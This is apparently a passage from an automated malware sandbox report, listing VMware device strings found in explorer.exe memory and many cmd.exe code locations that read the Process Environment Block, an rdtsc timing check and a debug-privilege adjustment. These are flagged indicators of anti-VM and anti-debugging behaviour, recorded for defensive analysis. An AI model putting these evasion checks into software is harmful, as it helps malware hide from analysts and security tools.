Source: explorer.exe, 00000014.00000000.439828418.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000014.00000000.417862735.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000014.00000000.454709344.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.418245983.000000000072D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000014.00000000.495338215.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000014.00000000.457197494.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 5_2_03795BA5 rdtsc

5_2_03795BA5

Source: C:\Windows\SysWOW64\cmd.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CDB60 mov ecx, dword ptr fs:[00000030h]	5_2_036CDB60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F3B7A mov eax, dword ptr fs:[00000030h]	5_2_036F3B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F3B7A mov eax, dword ptr fs:[00000030h]	5_2_036F3B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798B58 mov eax, dword ptr fs:[00000030h]	5_2_03798B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CDB40 mov eax, dword ptr fs:[00000030h]	5_2_036CDB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CF358 mov eax, dword ptr fs:[00000030h]	5_2_036CF358
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378131B mov eax, dword ptr fs:[00000030h]	5_2_0378131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EDBE9 mov eax, dword ptr fs:[00000030h]	5_2_036EDBE9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F03E2 mov eax, dword ptr fs:[00000030h]	5_2_036F03E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037453CA mov eax, dword ptr fs:[00000030h]	5_2_037453CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037453CA mov eax, dword ptr fs:[00000030h]	5_2_037453CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4BAD mov eax, dword ptr fs:[00000030h]	5_2_036F4BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4BAD mov eax, dword ptr fs:[00000030h]	5_2_036F4BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F4BAD mov eax, dword ptr fs:[00000030h]	5_2_036F4BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03795BA5 mov eax, dword ptr fs:[00000030h]	5_2_03795BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D1B8F mov eax, dword ptr fs:[00000030h]	5_2_036D1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D1B8F mov eax, dword ptr fs:[00000030h]	5_2_036D1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378138A mov eax, dword ptr fs:[00000030h]	5_2_0378138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377D380 mov ecx, dword ptr fs:[00000030h]	5_2_0377D380
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2397 mov eax, dword ptr fs:[00000030h]	5_2_036F2397
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FB390 mov eax, dword ptr fs:[00000030h]	5_2_036FB390
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370927A mov eax, dword ptr fs:[00000030h]	5_2_0370927A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377B260 mov eax, dword ptr fs:[00000030h]	5_2_0377B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377B260 mov eax, dword ptr fs:[00000030h]	5_2_0377B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798A62 mov eax, dword ptr fs:[00000030h]	5_2_03798A62
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03754257 mov eax, dword ptr fs:[00000030h]	5_2_03754257
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9240 mov eax, dword ptr fs:[00000030h]	5_2_036C9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9240 mov eax, dword ptr fs:[00000030h]	5_2_036C9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9240 mov eax, dword ptr fs:[00000030h]	5_2_036C9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9240 mov eax, dword ptr fs:[00000030h]	5_2_036C9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378EA55 mov eax, dword ptr fs:[00000030h]	5_2_0378EA55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA229 mov eax, dword ptr fs:[00000030h]	5_2_036EA229
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03704A2C mov eax, dword ptr fs:[00000030h]	5_2_03704A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03704A2C mov eax, dword ptr fs:[00000030h]	5_2_03704A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D8A0A mov eax, dword ptr fs:[00000030h]	5_2_036D8A0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378AA16 mov eax, dword ptr fs:[00000030h]	5_2_0378AA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378AA16 mov eax, dword ptr fs:[00000030h]	5_2_0378AA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E3A1C mov eax, dword ptr fs:[00000030h]	5_2_036E3A1C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CAA16 mov eax, dword ptr fs:[00000030h]	5_2_036CAA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CAA16 mov eax, dword ptr fs:[00000030h]	5_2_036CAA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C5210 mov eax, dword ptr fs:[00000030h]	5_2_036C5210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C5210 mov ecx, dword ptr fs:[00000030h]	5_2_036C5210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C5210 mov eax, dword ptr fs:[00000030h]	5_2_036C5210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C5210 mov eax, dword ptr fs:[00000030h]	5_2_036C5210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2AE4 mov eax, dword ptr fs:[00000030h]	5_2_036F2AE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2ACB mov eax, dword ptr fs:[00000030h]	5_2_036F2ACB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C52A5 mov eax, dword ptr fs:[00000030h]	5_2_036C52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C52A5 mov eax, dword ptr fs:[00000030h]	5_2_036C52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C52A5 mov eax, dword ptr fs:[00000030h]	5_2_036C52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C52A5 mov eax, dword ptr fs:[00000030h]	5_2_036C52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C52A5 mov eax, dword ptr fs:[00000030h]	5_2_036C52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_036DAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_036DAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FFAB0 mov eax, dword ptr fs:[00000030h]	5_2_036FFAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FD294 mov eax, dword ptr fs:[00000030h]	5_2_036FD294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FD294 mov eax, dword ptr fs:[00000030h]	5_2_036FD294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CC962 mov eax, dword ptr fs:[00000030h]	5_2_036CC962
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CB171 mov eax, dword ptr fs:[00000030h]	5_2_036CB171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CB171 mov eax, dword ptr fs:[00000030h]	5_2_036CB171
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EB944 mov eax, dword ptr fs:[00000030h]	5_2_036EB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EB944 mov eax, dword ptr fs:[00000030h]	5_2_036EB944
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120 mov eax, dword ptr fs:[00000030h]	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120 mov eax, dword ptr fs:[00000030h]	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120 mov eax, dword ptr fs:[00000030h]	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120 mov eax, dword ptr fs:[00000030h]	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120 mov ecx, dword ptr fs:[00000030h]	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F513A mov eax, dword ptr fs:[00000030h]	5_2_036F513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F513A mov eax, dword ptr fs:[00000030h]	5_2_036F513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9100 mov eax, dword ptr fs:[00000030h]	5_2_036C9100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9100 mov eax, dword ptr fs:[00000030h]	5_2_036C9100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9100 mov eax, dword ptr fs:[00000030h]	5_2_036C9100
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_036CB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_036CB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_036CB1E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037541E8 mov eax, dword ptr fs:[00000030h]	5_2_037541E8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037451BE mov eax, dword ptr fs:[00000030h]	5_2_037451BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037451BE mov eax, dword ptr fs:[00000030h]	5_2_037451BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037451BE mov eax, dword ptr fs:[00000030h]	5_2_037451BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037451BE mov eax, dword ptr fs:[00000030h]	5_2_037451BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F61A0 mov eax, dword ptr fs:[00000030h]	5_2_036F61A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F61A0 mov eax, dword ptr fs:[00000030h]	5_2_036F61A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov eax, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov eax, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov eax, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov ecx, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF mov eax, dword ptr fs:[00000030h]	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037469A6 mov eax, dword ptr fs:[00000030h]	5_2_037469A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037849A4 mov eax, dword ptr fs:[00000030h]	5_2_037849A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037849A4 mov eax, dword ptr fs:[00000030h]	5_2_037849A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037849A4 mov eax, dword ptr fs:[00000030h]	5_2_037849A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037849A4 mov eax, dword ptr fs:[00000030h]	5_2_037849A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA185 mov eax, dword ptr fs:[00000030h]	5_2_036FA185
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EC182 mov eax, dword ptr fs:[00000030h]	5_2_036EC182
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2990 mov eax, dword ptr fs:[00000030h]	5_2_036F2990
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03782073 mov eax, dword ptr fs:[00000030h]	5_2_03782073
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03791074 mov eax, dword ptr fs:[00000030h]	5_2_03791074
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E0050 mov eax, dword ptr fs:[00000030h]	5_2_036E0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E0050 mov eax, dword ptr fs:[00000030h]	5_2_036E0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F002D mov eax, dword ptr fs:[00000030h]	5_2_036F002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F002D mov eax, dword ptr fs:[00000030h]	5_2_036F002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F002D mov eax, dword ptr fs:[00000030h]	5_2_036F002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F002D mov eax, dword ptr fs:[00000030h]	5_2_036F002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F002D mov eax, dword ptr fs:[00000030h]	5_2_036F002D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DB02A mov eax, dword ptr fs:[00000030h]	5_2_036DB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DB02A mov eax, dword ptr fs:[00000030h]	5_2_036DB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DB02A mov eax, dword ptr fs:[00000030h]	5_2_036DB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DB02A mov eax, dword ptr fs:[00000030h]	5_2_036DB02A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA830 mov eax, dword ptr fs:[00000030h]	5_2_036EA830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA830 mov eax, dword ptr fs:[00000030h]	5_2_036EA830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA830 mov eax, dword ptr fs:[00000030h]	5_2_036EA830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA830 mov eax, dword ptr fs:[00000030h]	5_2_036EA830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747016 mov eax, dword ptr fs:[00000030h]	5_2_03747016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747016 mov eax, dword ptr fs:[00000030h]	5_2_03747016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747016 mov eax, dword ptr fs:[00000030h]	5_2_03747016
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03794015 mov eax, dword ptr fs:[00000030h]	5_2_03794015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03794015 mov eax, dword ptr fs:[00000030h]	5_2_03794015
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C58EC mov eax, dword ptr fs:[00000030h]	5_2_036C58EC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C40E1 mov eax, dword ptr fs:[00000030h]	5_2_036C40E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C40E1 mov eax, dword ptr fs:[00000030h]	5_2_036C40E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C40E1 mov eax, dword ptr fs:[00000030h]	5_2_036C40E1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0375B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0 mov eax, dword ptr fs:[00000030h]	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FF0BF mov ecx, dword ptr fs:[00000030h]	5_2_036FF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FF0BF mov eax, dword ptr fs:[00000030h]	5_2_036FF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FF0BF mov eax, dword ptr fs:[00000030h]	5_2_036FF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037090AF mov eax, dword ptr fs:[00000030h]	5_2_037090AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C9080 mov eax, dword ptr fs:[00000030h]	5_2_036C9080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03743884 mov eax, dword ptr fs:[00000030h]	5_2_03743884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03743884 mov eax, dword ptr fs:[00000030h]	5_2_03743884
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DFF60 mov eax, dword ptr fs:[00000030h]	5_2_036DFF60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03798F6A mov eax, dword ptr fs:[00000030h]	5_2_03798F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DEF40 mov eax, dword ptr fs:[00000030h]	5_2_036DEF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C4F2E mov eax, dword ptr fs:[00000030h]	5_2_036C4F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C4F2E mov eax, dword ptr fs:[00000030h]	5_2_036C4F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FE730 mov eax, dword ptr fs:[00000030h]	5_2_036FE730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA70E mov eax, dword ptr fs:[00000030h]	5_2_036FA70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FA70E mov eax, dword ptr fs:[00000030h]	5_2_036FA70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375FF10 mov eax, dword ptr fs:[00000030h]	5_2_0375FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0375FF10 mov eax, dword ptr fs:[00000030h]	5_2_0375FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379070D mov eax, dword ptr fs:[00000030h]	5_2_0379070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379070D mov eax, dword ptr fs:[00000030h]	5_2_0379070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EF716 mov eax, dword ptr fs:[00000030h]	5_2_036EF716
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037037F5 mov eax, dword ptr fs:[00000030h]	5_2_037037F5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747794 mov eax, dword ptr fs:[00000030h]	5_2_03747794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747794 mov eax, dword ptr fs:[00000030h]	5_2_03747794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03747794 mov eax, dword ptr fs:[00000030h]	5_2_03747794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D8794 mov eax, dword ptr fs:[00000030h]	5_2_036D8794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D766D mov eax, dword ptr fs:[00000030h]	5_2_036D766D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAE73 mov eax, dword ptr fs:[00000030h]	5_2_036EAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAE73 mov eax, dword ptr fs:[00000030h]	5_2_036EAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAE73 mov eax, dword ptr fs:[00000030h]	5_2_036EAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAE73 mov eax, dword ptr fs:[00000030h]	5_2_036EAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAE73 mov eax, dword ptr fs:[00000030h]	5_2_036EAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D7E41 mov eax, dword ptr fs:[00000030h]	5_2_036D7E41
